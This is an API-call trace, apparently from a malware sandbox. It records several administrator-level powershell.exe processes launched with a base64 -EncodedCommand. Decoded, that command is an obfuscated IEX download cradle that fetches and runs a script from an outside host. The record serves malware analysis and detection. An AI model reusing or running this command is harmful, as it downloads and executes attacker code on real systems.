	[0815.223] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.223] SetErrorMode (uMode=0x1) returned 0x1
	[0815.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.223] SetErrorMode (uMode=0x1) returned 0x1
	[0815.224] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.224] SetErrorMode (uMode=0x1) returned 0x1
	[0815.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.224] SetErrorMode (uMode=0x1) returned 0x1
	[0815.224] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.225] SetErrorMode (uMode=0x1) returned 0x1
	[0815.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.225] SetErrorMode (uMode=0x1) returned 0x1
	[0815.225] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.225] SetErrorMode (uMode=0x1) returned 0x1
	[0815.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.226] SetErrorMode (uMode=0x1) returned 0x1
	[0815.226] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.226] SetErrorMode (uMode=0x1) returned 0x1
	[0815.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.226] SetErrorMode (uMode=0x1) returned 0x1
	[0815.226] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.227] SetErrorMode (uMode=0x1) returned 0x1
	[0815.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.227] SetErrorMode (uMode=0x1) returned 0x1
	[0815.227] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.227] SetErrorMode (uMode=0x1) returned 0x1
	[0815.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0815.229] SetErrorMode (uMode=0x1) returned 0x1
	[0815.230] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x28562f0
	[0815.231] FindNextFileW (in: hFindFile=0x28562f0, lpFindFileData=0x1c6bddf0 | out: lpFindFileData=0x1c6bddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0815.231] FindClose (in: hFindFile=0x28562f0 | out: hFindFile=0x28562f0) returned 1
	[0815.231] SetErrorMode (uMode=0x1) returned 0x1
	[0815.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c6bdf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0815.232] SetErrorMode (uMode=0x1) returned 0x1
	[0815.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c6be110 | out: lpFileInformation=0x1c6be110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0815.232] SetErrorMode (uMode=0x1) returned 0x1
	[0815.236] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0815.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.236] CoTaskMemFree (pv=0x1f3c80) 
	[0815.238] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0815.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.238] CoTaskMemFree (pv=0x1f3c80) 
	[0815.241] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0815.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0815.241] CoTaskMemFree (pv=0x1f3c80) 
	[0816.533] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0816.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.533] CoTaskMemFree (pv=0x1f3c80) 
	[0816.549] CoTaskMemAlloc (cb=0x3b) returned 0x2979c0
	[0816.549] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6be2f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6be2f8) returned 0x4550
	[0816.550] CoTaskMemFree (pv=0x2979c0) 
	[0816.553] GetConsoleWindow () returned 0x105c6
	[0816.562] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0816.562] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0816.562] CoTaskMemFree (pv=0x1f3c80) 
	[0818.174] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0818.174] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0818.174] CoTaskMemFree (pv=0x1f3c80) 
	[0818.180] CoTaskMemAlloc (cb=0x104) returned 0x1f3c80
	[0818.180] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0818.180] CoTaskMemFree (pv=0x1f3c80) 
	[0818.182] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c6be340 | out: pNumArgs=0x1c6be340) returned 0x294920*=""
	[0818.184] lstrlenW (lpString="-EncodedCommand") returned 15
	[0818.185] CoTaskMemAlloc (cb=0x22) returned 0x2884eb0
	[0818.185] RtlMoveMemory (in: Destination=0x2884eb0, Source=0x294942, Length=0x20 | out: Destination=0x2884eb0) 
	[0818.185] CoTaskMemFree (pv=0x2884eb0) 
	[0818.185] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0818.185] CoTaskMemAlloc (cb=0x2f4) returned 0x2876a90
	[0818.185] RtlMoveMemory (in: Destination=0x2876a90, Source=0x294962, Length=0x2f2 | out: Destination=0x2876a90) 
	[0818.185] CoTaskMemFree (pv=0x2876a90) 
	[0818.186] LocalFree (hMem=0x294920) returned 0x0
	[0818.186] CoTaskMemAlloc (cb=0x804) returned 0x2893720
	[0818.187] GetConsoleTitleW (in: lpConsoleTitle=0x2893720, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0818.187] CoTaskMemFree (pv=0x2893720) 
	[0818.196] CoTaskMemAlloc (cb=0x38e) returned 0x294920
	[0818.196] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c6be2a0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2fe8518 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2fe8518*(hProcess=0x35c, hThread=0x358, dwProcessId=0x1384, dwThreadId=0xbb4)) returned 1
	[0818.839] CoTaskMemFree (pv=0x294920) 
	[0818.840] CloseHandle (hObject=0x358) returned 1
	[0818.840] CoTaskMemAlloc (cb=0x3b) returned 0x2979c0
	[0818.840] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c6be348, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c6be348) returned 0x4550
	[0818.841] CoTaskMemFree (pv=0x2979c0) 
	[0818.844] GetCurrentProcess () returned 0xffffffffffffffff
	[0818.844] GetCurrentProcess () returned 0xffffffffffffffff
	[0818.845] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c6be428, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c6be428*=0x358) returned 1

Process:
	id = "118"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x60f5a000"
	os_pid = "0x1348"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 605
	os_tid = 0x934

	[0435.142] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 704
	os_tid = 0x15f4


Thread:
	id = 747
	os_tid = 0x16f8


Process:
	id = "119"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x60867000"
	os_pid = "0xe84"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 607
	os_tid = 0xe9c

	[0435.293] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68

Thread:
	id = 708
	os_tid = 0x1604


Thread:
	id = 748
	os_tid = 0x16fc


Thread:
	id = 1504
	os_tid = 0xb74


Thread:
	id = 1511
	os_tid = 0x1e6c


Thread:
	id = 1580
	os_tid = 0x212c


Thread:
	id = 1694
	os_tid = 0x23b0


Process:
	id = "120"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x61b6f000"
	os_pid = "0x13e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "29"
	os_parent_pid = "0x68c"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 609
	os_tid = 0xc78

	[0827.058] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0836.731] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.732] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0836.732] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0836.732] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0944.195] GetVersionExW (in: lpVersionInformation=0x26df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26df40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.197] GetVersionExW (in: lpVersionInformation=0x26df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26df40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0944.839] GetVersionExW (in: lpVersionInformation=0x26dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0944.839] SetErrorMode (uMode=0x1) returned 0x1
	[0944.840] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26de10 | out: lpFileInformation=0x26de10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0944.841] SetErrorMode (uMode=0x1) returned 0x1
	[0944.843] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26e080 | out: lpdwHandle=0x26e080) returned 0x94c
	[0944.848] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e072b8 | out: lpData=0x2e072b8) returned 1
	[0944.850] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dff8, puLen=0x26dff0 | out: lplpBuffer=0x26dff8*=0x2e07354, puLen=0x26dff0) returned 1
	[0944.853] lstrlenW (lpString="䅁") returned 1
	[0944.861] VerQueryValueW (in: pBlock=0x2e072b8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26df68, puLen=0x26df60 | out: lplpBuffer=0x26df68*=0x2e07430, puLen=0x26df60) returned 1
	[0944.862] lstrlenW (lpString="Microsoft Corporation") returned 21
